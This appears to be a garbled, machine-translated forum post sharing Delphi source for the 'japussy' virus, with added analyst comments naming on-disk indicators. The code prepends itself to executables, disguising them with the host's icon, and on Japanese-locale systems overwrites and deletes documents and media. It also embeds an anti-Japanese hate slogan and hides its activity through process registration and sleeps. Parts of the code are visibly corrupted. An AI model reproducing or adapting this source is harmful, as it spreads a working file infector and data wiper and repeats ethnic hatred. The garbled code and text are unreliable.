After sending a piece of code, the virus author who previously earned 3000 yuan earned more than January yuan in 0.1 million. After my consideration, I sent it out to get a code segment from where I am a black-based gold VIP. Please do not do anything bad with it; it is only for studying how to use the code to write better code. This virus-killing tool will benefit everyone.
This is definitely not bragging. I used to sell it for 3000 yuan, and it is still worth the money. Here I am releasing the code for member research only, not for anything else; I don't want to bring any trouble on myself because of this code segment.
This code will not be unfamiliar to anyone; maybe your computer will be paralyzed by it...
I don't need to say any more: you will recognize this as the core code of pandatv compiled by Li Jun.
// Analyst notes: this listing is the core of the "japussy" prepending PE infector / file
// smasher. The constants below are the on-disk indicators a detector can key on: HEADERSIZE
// is the length of the stub prepended to every host, ID is the 4-byte trailer written after
// the host, and CATCHWORD is the byte pattern smashfile writes into files before deleting them.
Program japussy;
Uses
Windows, sysutils, classes, graphics, shellapi {, registry };
Const
Headersize = 82432; // the size of the virus.
Iconoffset = $12eb8; // offset of the primary graph of the PE File
// The size obtained by compiling on my delphi5 SP1. The Delphi of other versions may be different.
// Search for the hexadecimal string of 2800000020 to find the offset of the primary graph.
{
Headersize = 38912; // the size of the virus body compressed by UPX
Iconoffset = $ 92bc; // the offset of the UPX compressed over the main graph of the PE File
// UPX 1.24 W usage: UPX-9 -- 8086 japussy.exe
}
Iconsize = $2e8; // the size of the master image of the PE file, which is 744 bytes.
Icontail = iconoffset + iconsize; // end of the Main chart of the PE File
Id = $44444444; // infection mark
// Spam code for writing
Catchword = 'If a race need to be killed out, it must be Yamato. '+
'If a country need to be destroyed, it must be Japan! '+
'*** W32.japussy. worm. ***';
{$ R *. Res}
// Win9x-only kernel32 export, resolved at load time; the main block calls it so the process
// is registered as a service process on 9x.
Function registerserviceprocess (dwprocessid, dwtype: integer): integer;
Stdcall; External 'kernel32. dll '; // function declaration
VaR
Tmpfile: string; // path of the extracted host copy, built in the main block
Si: startupinfo; // filled by fillstartupinfo before the CreateProcess call in the main block
Pi: process_information; // receives the handles of the host process started in the main block
Isjap: Boolean = false; // Japanese OS tag (set in infectfiles when GetACP = 932; gates smashfile)
{ Platform probe: True only when GetVersionEx succeeds and reports the
  VER_PLATFORM_WIN32_WINDOWS platform (Windows 95/98/Me); False on failure or on NT. }
function IsWin9x: Boolean;
var
  Info: TOSVersionInfo;
begin
  Info.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);
  // Short-circuit evaluation: dwPlatformId is only inspected when the call succeeded.
  Result := GetVersionEx(Info) and (Info.dwPlatformId = VER_PLATFORM_WIN32_WINDOWS);
end;
{ Copies Count bytes from offset SStartPos of Src to offset DStartPos of Dst.
  Both streams are left at the positions they had on entry, so the caller's
  cursors are not disturbed by the copy. Offsets are absolute (from the beginning). }
procedure CopyStream(Src: TStream; SStartPos: Integer; Dst: TStream;
  DStartPos: Integer; Count: Integer);
var
  SavedSrcPos, SavedDstPos: Longint;
begin
  // Remember where each stream currently points.
  SavedSrcPos := Src.Position;
  SavedDstPos := Dst.Position;
  // Move both cursors to the requested absolute offsets and transfer the bytes.
  Src.Seek(SStartPos, soFromBeginning);
  Dst.Seek(DStartPos, soFromBeginning);
  Dst.CopyFrom(Src, Count);
  // Restore the original cursors (Position's setter seeks from the beginning).
  Src.Position := SavedSrcPos;
  Dst.Position := SavedDstPos;
end;
{Separating the host file from the infected pe file for use}
// Reads this process's own image (paramstr(0)) from offset headersize to the end and writes
// those bytes to filename, i.e. recovers the host program that was appended after the stub.
// Because the copy runs to the very end of the image, the 4-byte infection marker that
// infectonefile appends after the host is carried into the extracted copy as well.
// Any exception (image locked, write failure) is swallowed by the outer try..except, so a
// failed extraction leaves nothing behind and the caller continues regardless.
Procedure extractfile (filename: string );
VaR
Sstream, dstream: tfilestream;
Begin
Try
Sstream: = tfilestream. Create (paramstr (0), fmopenread or fmsharedenynone );
Try
Dstream: = tfilestream. Create (filename, fmcreate );
Try
Sstream. Seek (headersize, 0); // skip the virus section of the header
Dstream. copyfrom (sstream, sstream. Size-headersize );
Finally
Dstream. Free;
End;
Finally
Sstream. Free;
End;
Except
End;
End;
{ Prepares a STARTUPINFO record for CreateProcess: every pointer/reserved field is
  cleared, cb is set to the record size, and only the show-window flag is enabled so
  that State (an SW_* constant) controls how the new process's window appears. }
procedure FillStartupInfo(var Si: STARTUPINFO; State: Word);
begin
  with Si do
  begin
    cb := SizeOf(Si);
    lpReserved := nil;
    lpDesktop := nil;
    lpTitle := nil;
    dwFlags := STARTF_USESHOWWINDOW;  // makes wShowWindow honoured
    wShowWindow := State;
    cbReserved2 := 0;
    lpReserved2 := nil;
  end;
end;
{Mail with virus}
// Intentionally empty in this listing: infectfiles calls it once per sweep, but no mail code
// is present, so the sample as published does not propagate by e-mail.
Procedure Sendmail;
Begin
// Who is willing to do this?
End;
{Infected pe file}
// Prepends this program's own stub to one executable, replacing it in place. Layout of the
// written file, as produced by the copystream calls below:
//   [stub bytes 0..iconoffset) [host's main icon, iconsize bytes]
//   [stub bytes icontail..headersize) [original host file] [4-byte marker $44444444]
// The host's own icon is spliced into the stub's icon slot, so the infected file keeps its
// original appearance. Skipped: a file named 'japussy.exe', files with no 'PE' tag in the
// first $109 bytes, files smaller than 10240 bytes, and files already ending in the marker.
// The whole body sits in a bare try..except, so any I/O error (e.g. file in use) aborts silently.
Procedure infectonefile (filename: string );
VaR
Hdrstream, srcstream: tfilestream;
Icostream, dststream: tmemorystream;
IID: longint;
Aicon: ticon;
Infected, ISPE: Boolean;
I: integer;
Buf: array [0 .. 1] of char;
Begin
Try // if an error occurs, the file is in use and exits.
If comparetext (filename, 'japussy.exe ') = 0 then // if you are yourself, do not infect
Exit;
Infected: = false;
ISPE: = false;
Srcstream: = tfilestream. Create (filename, fmopenread );
Try
// Byte-scans the first $109 bytes for the two characters 'P','E'; the header is not parsed.
For I: = 0 to $108 Do // check the PE File Header
Begin
Srcstream. Seek (I, sofrombeginning );
Srcstream. Read (BUF, 2 );
If (BUF [0] = #80) and (BUF [1] = #69) Then // PE tag
Begin
ISPE: = true; // It is a PE file.
Break;
End;
End;
// The last 4 bytes of an already-infected file hold ID (written below), so reinfection is avoided.
Srcstream. Seek (-4, sofromend); // check the infection mark
Srcstream. Read (IID, 4 );
If (IID = ID) or (srcstream. Size <10240) Then // files that are too small are not infected
Infected: = true;
Finally
Srcstream. Free;
End;
If infected or (not ISPE) Then // exit if the file is infected or not a PE File
Exit;
Icostream: = tmemorystream. Create;
Dststream: = tmemorystream. Create;
Try
Aicon: = ticon. Create;
Try
// Obtain the master icon of the infected file (744 bytes) and store it to the stream.
Aicon. releasehandle;
Aicon. Handle: = extracticon (hinstance, pchar (filename), 0 );
Aicon. savetostream (icostream );
Finally
Aicon. Free;
End;
Srcstream: = tfilestream. Create (filename, fmopenread );
// Header file
Hdrstream: = tfilestream. Create (paramstr (0), fmopenread or fmsharedenynone );
Try
// Write data before the main icon of the virus.
Copystream (hdrstream, 0, dststream, 0, iconoffset );
// Write the main icon of the current program
// (offset 22 presumably skips the .ico stream's own header so only image data is copied - confirm)
Copystream (icostream, 22, dststream, iconoffset, iconsize );
// Write data between the main icon of the virus and the end of the virus.
Copystream (hdrstream, icontail, dststream, icontail, headersize-icontail );
// Write the Host Program
Copystream (srcstream, 0, dststream, headersize, srcstream. size );
// Write the infected mark (same value as the ID constant, written as a literal here)
Dststream. Seek (0, 2 );
IID: = $44444444;
Dststream. Write (IID, 4 );
Finally
Hdrstream. Free;
End;
Finally
Srcstream. Free;
Icostream. Free;
Dststream. savetofile (filename); // Replace the host file (overwritten on disk, in place)
Dststream. Free;
End;
Except;
End;
End;
{Write the target file to the spam code and delete it}
// Overwrites a file with CATCHWORD at Max (5..14) evenly spaced offsets, then deletes it.
// Only Len bytes are written at each offset, so the bytes in between are not touched before
// DeleteFile. Errors (open failure etc.) are swallowed by the bare try..except.
// Reached from loopfiles only when isjap is set, i.e. on a code-page-932 system.
Procedure smashfile (filename: string );
VaR
Filehandle: integer;
I, size, mass, Max, Len: integer;
Begin
Try
Setfileattributes (pchar (filename), 0); // remove the read-only attribute
Filehandle: = fileopen (filename, fmopenwrite); // open the file
Try
Size: = getfilesize (filehandle, nil); // File Size
I: = 0;
Randomize;
MAX: = random (15); // random number of times the spam code is written (0..14, raised to at least 5 below)
If max <5 then
MAX: = 5;
// For a file shorter than Max bytes this is 0 and every write lands at offset 0.
Mass: = size Div Max; // size of each interval Block
Len: = length (catchword );
While I <Max do
Begin
FileSeek (filehandle, I * mass, 0); // locate
// Write the spam code to completely destroy the file
Filewrite (filehandle, catchword, Len );
INC (I );
End;
Finally
Fileclose (filehandle); // close the file
End;
Deletefile (pchar (filename); // delete it
Except
End;
End;
{Get writable drive list}
// Returns the letters of every drive whose type is DRIVE_FIXED or DRIVE_REMOTE (e.g. 'CDZ');
// removable and CD-ROM drives are not included. This is the drive list infectfiles sweeps.
// NOTE(review): Result is not explicitly set to '' before appending; confirm it starts empty
// with this compiler, since a string Result can carry the caller's previous value.
Function getdrives: string;
VaR
Disktype: word;
D: Char;
STR: string;
I: integer;
Begin
For I: = 0 to 25 do // print 26 letters
Begin
D: = CHR (I + 65 );
STR: = d + ':/'; // root path passed to GetDriveType (printed with '/' here; the page may have normalised the separator)
Disktype: = getdrivetype (pchar (STR ));
// Obtain the local disk and Network Disk
If (disktype = drive_fixed) or (disktype = drive_remote) then
Result: = Result + D;
End;
End;
{Traverse directories, infect and destroy files}
// Depth-first walk of path: every entry matching mask that is a plain file is dispatched by
// extension - .exe/.scr to infectonefile, and (only when isjap is set) the listed document/
// media types to smashfile. The HTML/ASP, .wab, .adc and Foxmail branches are empty stubs in
// this listing. After each entry the message queue is pumped and the thread sleeps 200 ms,
// then every subdirectory (attribute exactly faDirectory) is visited recursively.
// NOTE(review): several literals carry stray spaces ('.exe ', '. scr') and some extension
// names look garbled ('hangzhou', 'users'); these appear to be transcription artifacts of
// this page rather than the author's original text.
Procedure loopfiles (path, mask: string );
VaR
I, Count: integer;
FN, ext: string;
Subdir: tstrings;
Searchrec: tsearchrec;
MSG: tmsg;
// Classifies a search result: 0 = plain entry, 1 = subdirectory to recurse into, 2 = '.'/'..'.
// The attribute test is an exact compare with 16 (directory bit only), so a directory that
// also carries hidden/system bits is classed 0 and is neither recursed into nor, by the
// extension checks below, normally touched.
Function isvaliddir (searchrec: tsearchrec): integer;
Begin
If (searchrec. ATTR <> 16) and (searchrec. Name <> '.') and
(Searchrec. Name <> '..') then
Result: = 0 // not a directory
Else if (searchrec. ATTR = 16) and (searchrec. Name <> '.') and
(Searchrec. Name <> '..') then
Result: = 1 // not the root directory
Else result: = 2; // the root directory.
End;
Begin
If (findfirst (path + mask, faanyfile, searchrec) = 0) then
Begin
Repeat
// Message pumping plus the 200 ms sleep below keep CPU usage low; a per-file
// cadence of one PeekMessage + Sleep is part of this sample's runtime profile.
Peekmessage (MSG, 0, 0, 0, pm_remove); // adjust the message queue to avoid suspicion.
If isvaliddir (searchrec) = 0 then
Begin
FN: = path + searchrec. Name;
Ext: = uppercase (extractfileext (FN )); // upper-cased, so the comparisons below are case-sensitive against that form
If (EXT = '.exe ') or (EXT ='. scr ') then
Begin
Infectonefile (FN); // infect the executable file
End
Else if (EXT = '.htm') or (EXT = '.html ') or (EXT ='. asp ') then
Begin
// Infect HTML and ASP files and write base64-encoded viruses
// Infect all users who browse this page
// Which of the following is willing to do this?
End
Else if ext = '. wab' then // Outlook Address Book File
Begin
// Obtain the Outlook Email Address
End
Else if ext = '. ADC' Then // the Foxmail address automatically completes the file.
Begin
// Obtain the Foxmail email address
End
Else if ext = 'ind 'then // Foxmail Address Book File
Begin
// Obtain the Foxmail email address
End
Else
Begin
If isjap then // the operating system of the plain text
Begin
// Destructive branch: only on a code-page-932 system (see infectfiles).
If (EXT = '.doc ') or (EXT = '.xls') or (EXT = '. mdb') or
(EXT = 'hangzhou') or (EXT = '. M') or (EXT ='. A') or
(EXT = '.wma ') or (EXT = '.zip') or (EXT = '.rar ') or
(EXT = '. MpEG') or (EXT = '. asf') or (EXT = '.jpg') or
(EXT = '.jpeg ') or (EXT = '.gif') or (EXT = '.swf ') or
(EXT = 'users') or (EXT = '. chm') or (EXT ='. avi') then
Smashfile (FN); // destroy the file
End;
End;
End;
// After a file is infected or deleted, it sleeps for 200 milliseconds to avoid suspicion of high CPU usage.
Sleep (200 );
Until (findnext (searchrec) <> 0 );
End;
Findclose (searchrec );
// Second pass: collect subdirectory names, then recurse into each one.
Subdir: = tstringlist. Create;
If (findfirst (path + '*. *', fadirectory, searchrec) = 0) then
Begin
Repeat
If isvaliddir (searchrec) = 1 then
Subdir. Add (searchrec. Name );
Until (findnext (searchrec) <> 0 );
End;
Findclose (searchrec );
Count: = subdir. Count-1;
For I: = 0 to count do
Loopfiles (path + subdir. Strings + '/', mask );
Freeandnil (subdir );
End;
{Traverse all files on the disk}
// Top-level sweep. Sets isjap when the ANSI code page is 932 (Japanese), which enables the
// destructive smashfile branch in loopfiles; takes the drive list from getdrives; then loops
// forever: walk the drives, call Sendmail (a no-op in this listing), sleep five minutes, repeat.
// This procedure never returns.
Procedure infectfiles;
VaR
Driverlist: string;
I, Len: integer;
Begin
If getacp = 932 then // Japanese Operating System
Isjap: = true; // Let's die!
Driverlist: = getdrives; // obtain the writable disk list.
Len: = length (driverlist );
While true do // Infinite Loop
Begin
For I: = Len downto 1 do // traverse each disk drive
Loopfiles (driverlist + ':/', '*. *'); // infected
Sendmail; // send a mail with a virus
Sleep (1000*60*5); // sleep for 5 minutes
End;
End;
{Main program start}
// Entry point. On Win9x the process registers itself as a service process; the NT branch is
// an empty stub. If the running image is named japussy.exe it is the original dropper and
// goes straight to infectfiles (which never returns). Otherwise it is executing as an
// infected host: the original host is written next to it with a space inserted before the
// extension (the #32 below - a useful on-disk indicator), launched with CreateProcess, and
// only then does infectfiles run.
Begin
If iswin9x then // is Win9x
Registerserviceprocess (getcurrentprocessid, 1) // register as a service process
Else // winnt
Begin
// Remote thread ing to explorer process
// Which station is willing to complete?
End;
// If it is the original virus
If comparetext (extractfilename (paramstr (0), 'japussy.exe ') = 0 then
Infectfiles // infect and send emails
Else // has been parasitic on the host Program and started to work
Begin
Tmpfile: = paramstr (0); // create a temporary file
// NOTE(review): as printed, Delete starts at length-4 and so removes four characters ending
// one short of the end of the string; confirm the intended range against the author's source.
Delete (tmpfile, length (tmpfile)-4, 4 );
Tmpfile: = tmpfile + #32 + '.exe '; // real host file with one more space
Extractfile (tmpfile); // separated
Fillstartupinfo (Si, sw_showdefault );
// Host is started with '.' as its current directory; Pi receives its handles.
CreateProcess (pchar (tmpfile), pchar (tmpfile), nil, nil, true,
0, nil, '.', Si, Pi); // create a new process to run
Infectfiles; // infect and send emails
End;
End.